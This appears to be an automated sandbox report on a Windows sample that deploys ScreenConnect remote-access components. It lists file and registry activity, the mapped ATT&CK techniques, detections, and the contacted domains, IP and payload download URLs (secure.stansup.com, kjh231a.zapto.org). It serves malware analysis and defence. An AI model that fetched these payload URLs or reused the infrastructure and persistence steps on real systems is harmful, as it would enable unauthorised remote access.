                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsFileManager.exe VolumeInformation
                  Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                  Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe; Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe; Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe; Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe; Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe; Code function: 0_2_00BB1806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00BB1806
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe; Code function: 12_2_00884C71 RtlGetVersion,12_2_00884C71
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Lowering of HIPS / PFW / Operating System Security Settings

                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe; Registry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (ae095c23-8e22-4747-b9a0-c8c8b34ba57d)
                  Source: Amcache.hve.6.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.6.dr; Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.6.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.6.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.6.dr; Binary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe; Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: Yara match; File source: 10.0.ScreenConnect.WindowsClient.exe.a0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 00000002.00000002.2257457439.00000276A42F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000002.00000002.2237912718.000002768A2CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000A.00000002.1736710377.000000000242F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: dfsvc.exe PID: 7652, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 3708, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 5292, type: MEMORYSTR
                  Source: Yara match; File source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, type: DROPPED
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 121 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 Inhibit System Recovery |
| Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | 1 DLL Search Order Hijacking | 1 DLL Search Order Hijacking | 1 Obfuscated Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 2 Windows Service | 2 Windows Service | 1 Install Root Certificate | Security Account Manager | 35 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 12 Process Injection | 1 Software Packing | NTDS | 51 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Bootkit | 1 Scheduled Task/Job | 1 Timestomp | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 51 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Search Order Hijacking | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Masquerading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Modify Registry | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 51 Virtualization/Sandbox Evasion | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 12 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
| Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Hidden Users | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking |
| Determine Physical Locations | Virtual Private Server | Compromise Hardware Supply Chain | Unix Shell | Systemd Timers | Systemd Timers | 1 Bootkit | GUI Input Capture | Permission Groups Discovery | Replication Through Removable Media | Email Collection | Proxy | Exfiltration over USB | Network Denial of Service |
                  [Behavior graph: ID 1542316; Sample: 96r3GgxntQ.exe; Start date: 25/10/2024; Architecture: WINDOWS; Score: 66]

Source | Detection | Scanner | Label | Link
96r3GgxntQ.exe | 24% | ReversingLabs | Win32.Trojan.Generic |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Client.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Core.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Windows.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | |
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label | Link
https://g.live.com/odclientsettings/ProdV2.C: | 0% | URL Reputation | safe |
https://g.live.com/odclientsettings/Prod.C: | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://www.w3.or | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/soap/envelope/ | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/02/trust | 0% | URL Reputation | safe |
http://www.w3.o | 0% | URL Reputation | safe |
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | unknown
s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | true | false | | unknown
secure.stansup.com | 79.110.49.185 | true | false | | unknown
kjh231a.zapto.org | 79.110.49.185 | true | false | | unknown
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe | false | | unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config | false | | unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.config | false | | unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.config | false | | unknown
https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe | false | | unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe | false | | unknown
https://secure.stansup.com/Bin/ScreenConnect.ClientService.dll | false | | unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.dll | false | | unknown
https://secure.stansup.com/Bin/ScreenConnect.Windows.dll | false | | unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.manifest | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exXdfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exeyUdfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://secure.stansup.com/Bin/ScreScreenConnect.WindowsClient.exe, 0000000A.00000002.1735285114.0000000000599000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://account.live.com/Wizard/Password/Change?id=806013svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://secure.staPbdfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesuesvchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee0svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee1svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAsvchost.exe, 00000008.00000003.1476705098.000001CEA3129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://schemas.xmlsoap.org/soap/envelope/svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exexdfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492090712.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://secure.stansup.com/Bin/ScreenConnect.Client.application.MO3ScreenConnect.WindowsClient.exe, 0000000A.00000002.1747404710.000000001AD19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://Passport.NET/STSsvchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://secure.stansup.com/Bin/ScreenConnect.ClientService.dllkU9dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://docs.oasis-open.org/wss/2svchost.exe, 00000008.00000003.1542897371.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1524817078.000001CEA3178000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://www.w3.svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000002.00000002.2237912718.000002768A070000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://account.live.com/InlineSignup.aspx?iww=1&id=80502ssuersvchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://www.w3.odfsvc.exe, 00000002.00000002.2237912718.000002768A512000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A4A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1745338793.000000001ACF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://Passport.NET/tbsvchost.exe, 00000008.00000002.2609938156.000001CEA36C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507259190.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2609998357.000001CEA36DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1389610111.000001CEA3153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000008.00000003.1524817078.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1476303270.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492473258.000001CEA3174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455119455.000001CEA3110000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608495004.000001CEA3100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477152749.000001CEA3110000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507228196.000001CEA3107000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455865428.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455646765.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492113188.000001CEA315C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://secure.stansup.com/Bin/ScreenConnect.Clientdfsvc.exe, 00000002.00000002.2236254474.0000027688762000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                • 75% < No. of IPs
IP:79.110.49.185
Domain:secure.stansup.com
Country:Germany
ASN:57287
ASN Name:OTAVANET-ASCZ
Malicious:false
                                                                                                                                                                                                                IP
                                                                                                                                                                                                                127.0.0.1
                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                Analysis ID:1542316
                                                                                                                                                                                                                Start date and time:2024-10-25 19:26:13 +02:00
                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                Overall analysis duration:0h 8m 7s
                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                Cookbook file name:default.jbs
